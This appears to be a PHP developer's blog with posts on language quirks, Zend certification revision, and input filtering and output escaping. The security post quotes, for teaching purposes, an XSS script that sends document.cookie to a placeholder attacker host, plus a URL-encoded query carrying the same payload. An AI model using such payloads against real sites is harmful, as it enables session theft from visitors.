Apr 8 2010

Srsly PHP, why can’t I do this:

$value = isset($myGPCWrapper->Get("value")) ? $myGPCWrapper->Get("value") : $default;

Resulting in this:

Fatal error: Can’t use method return value in write context in /path/to/my/script.php on line 21

And instead I have to do this:

$foo = $myGPCWrapper->Get("value");
$value = isset($foo) ? $foo : $default;

or

$value = isset($_GET['value']) ? $myGPCWrapper->Get("value") : $default;

I mean… how is isset writing to my variable?!
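Since isset() only accepts variables, one way round the temporary is for the wrapper to take the default itself. The following is an added example, not code from the original post; the class and method names are assumptions, and a constructed array stands in for $_GET so it runs from the command line:

```php
<?php
// Added example (not from the original post): a request-parameter wrapper that
// takes the default itself, so the caller never needs isset() on a method
// return value. Class and method names are assumptions; $_GET is replaced by
// a constructed array so the snippet runs on its own.

class GPCWrapper
{
    private $params;

    public function __construct(array $params)
    {
        $this->params = $params;
    }

    // Returns the parameter if it is present and scalar, otherwise $default.
    // array_key_exists() rather than isset() so that an explicitly empty
    // string still counts as present; array values (?value[]=x) are rejected.
    public function Get($key, $default = null)
    {
        if (!array_key_exists($key, $this->params) || !is_scalar($this->params[$key])) {
            return $default;
        }
        return $this->params[$key];
    }
}

// Constructed stand-in for $_GET.
$wrapper = new GPCWrapper(array('value' => 'hello', 'empty' => '', 'list' => array('a')));

var_dump($wrapper->Get('value', 'default'));   // present
var_dump($wrapper->Get('empty', 'default'));   // present but empty string
var_dump($wrapper->Get('list', 'default'));    // array value, rejected
var_dump($wrapper->Get('missing', 'default')); // absent
```

With the default passed in, `$value = $myGPCWrapper->Get("value", $default);` replaces the isset() dance, and the wrapper decides in one place what "present" means.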

Mar 1 2010

Writing a bit of PHP tonight and found that if you use parse_ini_file to load an INI file in PHP, there is a slightly hacky way of having double quotes in strings. For example, I tried these:

somevalue = "This ""string"" has quotes"
somevalue = "This \"string\" has quotes"

But neither of them worked! A quick look at the PHP manual reveals a simple (but a bit hacky) solution: define a constant, e.g. QUOTE, to be " (a double quote), and use that in the INI string.

// In the PHP:
define('QUOTE', '"');
; and in the INI file
somevalue = "This "QUOTE"string"QUOTE" has quotes"

Aug 25 2009

[Image: zce-test2]

As some of you may know, back in March/April time, I started revising for my Zend PHP5 Certification, but that was pretty much put on hold when we had a baby… now I’m revising again and after having revised a couple of topics I retook the test. As you can see, I passed it “with flying colours” this time, but still have improvement to do with Streams and Design patterns…

Comparing with my last test:

  • 2 categories remained the same;
    • Database access
    • Web features
  • 4 categories improved;
    • PHP 4/5 Differences (was FAIL)
    • Security (was PASS)
    • String Manipulation and Regular Expressions (was PASS)
    • Functions (was PASS)
  • 2 categories declined;
    • Streams and Network Programming (was PASS)
    • Design (was EXCELLENT) [eep - not so good that!]

I think overall, however, these statistics shouldn’t be examined too much – there are some questions I can guess and that don’t demonstrate that I truly *know* some topics, so I’m going to cover off a few categories I don’t feel too confident on anyway – but then the practice tests are just indicators, and not meant to represent the final exam… we’ll see!

Feb 16 2009

If you follow my Twitter, then you already know that I’m intending to get a Zend PHP5 Certification. I’ve started off by ordering the Php|architect’s Zend PHP 5 Certification Study Guide from Amazon as I read an excerpt from that the other day and found it to be generally quite good. Still waiting for that to arrive, but next month I’m going to be ordering the Zend PHP Certification: Study Guide and some online practice tests. With any luck, that should be all I need to ace the test, and after reading Mike Bernat’s post about his experiences and a few other posts about the certification, I hope I should be able to pass. I’ll blog what I can about it; obviously those who take the test have to sign the NDA, but I’ll put as much of my experiences pre and post as I can.

Jan 29 2009

I’m currently working on cleaning up the sanitisation and validation libraries in our homegrown framework at Netbasic here, and I was given an excerpt from the Php|architect’s Zend PHP 5 Certification Study Guide – the Security chapter. The summary section really outlines a key point you should always bear in mind when writing any PHP code… filter input, escape output.

Filtering input is important, and it is recommended to do this using a “white list” approach – i.e. you specify the set of valid values for a particular field, and if the input does not match one of them, you discard it. Consider this:

// Example 1
$value = $_GET["colour"];
echo "Your favourite colour is {$value}";

This first example shows a lack of filtering. Potentially, as the study guide shows, the colour could be overridden and set to be:

<script>
document.location = 'http://myhackingsite.com/getcookies.php?cookies=' + document.cookie;
</script>

This small piece of JavaScript would then steal visitors’ cookies. Let’s look at the second example…

// Example 2
$value = "white";
$valid_colours = array("red","green","blue");
// isset() avoids a notice when the parameter is absent; the third argument
// makes the white-list comparison strict
if(isset($_GET["colour"]) && in_array($_GET["colour"], $valid_colours, true))
{
  $value = $_GET["colour"];
}
echo "Your favourite colour is {$value}";

This piece of code is much safer (although not totally secure…). $value has been initialised, which matters because, although I ensure register_globals = Off where possible, there may be some hosts that have register_globals On. The “colour” $_GET value is checked against a white list, and if it does not match, it is not assigned. If $value were not initialised and register_globals were On, then someone could pass a query such as:

http://mywebsite.com/example.php?colour=notacolour&value=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2Fmyhackingsite.com%2Fgetcookies.php%3Fcookies%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E

What would happen is that the “colour” argument would not match the white list, but $value would be initialised from the query string with the above piece of cookie-collecting JavaScript. An even safer version of this code also escapes the output:

// Example 3
$value = "white";
$valid_colours = array("red","green","blue");
if(isset($_GET["colour"]) && in_array($_GET["colour"], $valid_colours, true))
{
  $value = $_GET["colour"];
}
// escape for the HTML context; ENT_QUOTES also covers attribute values
$value = htmlentities($value, ENT_QUOTES, 'UTF-8');
echo "Your favourite colour is {$value}";

Even with register_globals On and $value uninitialised, the end user will just see the JavaScript as text, rather than the browser executing it.

Don’t forget, output isn’t limited to just outputting to the browser through echo or print – you need to think about storing data, such as in MySQL databases or in files. Thankfully, PHP provides database-specific escaping functions, such as mysql_real_escape_string.
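The three examples above, pulled together into one runnable "filter input, escape output" snippet. This is an added example, not code from the original post or the study guide: the function names are assumptions, the request arrays are constructed stand-ins for $_GET, and for the storage case it binds the value as a query parameter through PDO (assumed available with SQLite) rather than calling mysql_real_escape_string, since the mysql extension no longer exists in PHP 7 and parameter binding removes the need to escape by hand.

```php
<?php
// Added example (not from the original post): "filter input, escape output"
// applied to the colour parameter from the examples above. Function names are
// assumptions, and the request arrays below are constructed for the demo in
// place of $_GET.

// Whitelist filter: only an exact, string-typed match against $valid is
// accepted; a missing key, an array value (?colour[]=red) or an unknown colour
// falls back to $default. Strict in_array() avoids loose-comparison surprises.
function filterColour(array $input, array $valid, $default)
{
    if (!isset($input['colour']) || !is_string($input['colour'])) {
        return $default;
    }
    return in_array($input['colour'], $valid, true) ? $input['colour'] : $default;
}

// Escape for an HTML text or attribute context. ENT_QUOTES plus an explicit
// charset is what htmlentities()/htmlspecialchars() should always be given.
function escapeHtml($value)
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

function renderColour($colour)
{
    return 'Your favourite colour is ' . escapeHtml($colour);
}

$valid = array('red', 'green', 'blue');

// Constructed requests: a good value, an absent parameter, an array instead
// of a string, and a script tag in place of a colour.
$requests = array(
    'valid'   => array('colour' => 'green'),
    'missing' => array(),
    'array'   => array('colour' => array('red')),
    'script'  => array('colour' => '<script>alert(1)</script>'),
);

foreach ($requests as $name => $get) {
    // Filtering alone already neutralises the script case, because an unknown
    // colour is replaced by the default; escaping is still applied on output
    // so that whatever reaches the browser is treated as text, not markup.
    $colour = filterColour($get, $valid, 'white');
    printf("%-8s => %s\n", $name, renderColour($colour));
}

// Output to a database is output too. Instead of a string-escaping function,
// bind the value as a query parameter (PDO with in-memory SQLite, assumed to
// be available; the extension check keeps the snippet runnable without it).
if (extension_loaded('pdo_sqlite')) {
    $db = new PDO('sqlite::memory:');
    $db->exec('CREATE TABLE favourites (colour TEXT)');
    $stmt = $db->prepare('INSERT INTO favourites (colour) VALUES (:colour)');
    $stmt->execute(array(':colour' => filterColour($requests['valid'], $valid, 'white')));
    var_dump($db->query('SELECT colour FROM favourites')->fetchColumn());
}
```

The point of keeping filterColour() and escapeHtml() separate is that they answer different questions: the filter decides what the application accepts, and the escaper makes whatever is accepted safe for the specific context it is written to. Neither replaces the other, and each output context (HTML, SQL, a file) needs its own escaping or, where available, parameter binding.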

There’s much more to this than just what I’ve explained, and the study guide goes into a bit more depth. I recommend you pick up a copy and read it, even if you’re not studying for a Zend certification.